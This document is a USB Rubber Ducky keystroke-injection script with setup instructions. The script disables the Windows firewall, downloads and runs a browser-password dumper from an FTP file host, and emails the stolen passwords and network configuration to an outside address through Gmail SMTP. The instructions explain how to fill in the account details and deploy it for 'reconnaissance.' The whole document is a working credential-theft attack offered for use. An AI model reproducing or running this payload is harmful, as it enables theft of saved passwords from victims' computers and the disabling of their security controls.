``` DELAY 800 GUI DELAY 800 STRING Command Prompt CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 1500 STRING mkdir C:\DuckyReport ENTER STRING netsh advfirewall set allprofiles state off ENTER STRING ipconfig > C:\DuckyReport\ipconfig.txt ENTER STRING cd C:\DuckyReport ENTER STRING ftp ENTER STRING open ftp.drivehq.com ENTER DELAY 2500 STRING YourDriveHQUsername ENTER DELAY 2500 STRING YourDriveHQPassword ENTER DELAY 2500 STRING get BPD.exe ENTER DELAY 8000 STRING close ENTER DELAY 800 STRING quit ENTER DELAY 800 STRING BPD.exe -f BPD.txt ENTER DELAY 2500 STRING del BPD.exe ENTER DELAY 800 STRING Exit ENTER DELAY 800 GUI DELAY 1000 STRING Powershell ENTER DELAY 1000 STRING $emailSmtpServer = "smtp.gmail.com";$emailSmtpServerPort = "587";$emailSmtpUser = "yourgmailusername@gmail.com";$emailSmtpPass = "YourGmailPassword";$emailMessage = New-Object System.Net.Mail.MailMessage;$emailMessage.From = "DuckyScript Browser Passwords ";$emailMessage.To.Add("EmailToSendTo@example.com");$emailMessage.Body = "See attachments";$SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort );$SMTPClient.EnableSsl = $true;$SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass );$attachment = "C:\DuckyReport\BPD.txt";$emailMessage.Attachments.Add($attachment);$attachment2 = "C:\DuckyReport\ipconfig.txt";$emailMessage.Attachments.Add($attachment2);$SMTPClient.Send($emailMessage); ENTER DELAY 5000 STRING exit ENTER ``` ## Instructions: 1. Create an free account at [https://www.drivehq.com/features/ftp.aspx](https://www.drivehq.com/features/ftp.aspx) 2. Download BPD.zip and extract it from [https://drive.google.com/file/d/0B8k1o3N-X4vZVjNwZm5ac2hZNFE/view?usp=sharing](https://drive.google.com/file/d/0B8k1o3N-X4vZVjNwZm5ac2hZNFE/view?usp=sharing) 3. Go to your account and upload BPD.exe to the root directory. 4. In the script please change the following to your information: On line 22 ```STRING YourDriveHQUsername``` change ___YourDriveHQUsername___ to your username for www.drivehq.com On line 25 ```STRING YourDriveHQPassword``` change ___YourDriveHQPassword___ to your password for www.drivehq.com On line 51 ```$emailSmtpUser = "yourgmailusername@gmail.com";``` This the account email used to send the email with the passwords list. It is only set to use a gmail address. Change ___yourgmailusername@gmail.com___ to your email. Leave the quotation marks on both sides there. On line 51 ```$emailSmtpPass = "YourGmailPassword";``` change ___YourGmailPassword___ to the password for your account but leave the quotation marks on both sides there. On line 51 ```$emailMessage.From = "DuckyScript Browser Passwords ";``` change ___YourEmailAddressHere@gmail.com___ to your email address. Please leave the brackets on either side of the email address. On line 51 ```$emailMessage.To.Add("EmailToSendTo@example.com");``` change ___EmailToSendTo@example.com___ to whatever email you are sending the files to. Leave the quotation marks on both sides there. 5. Load the script on your USB RubberDucky and you are ready to do some reconnaissance.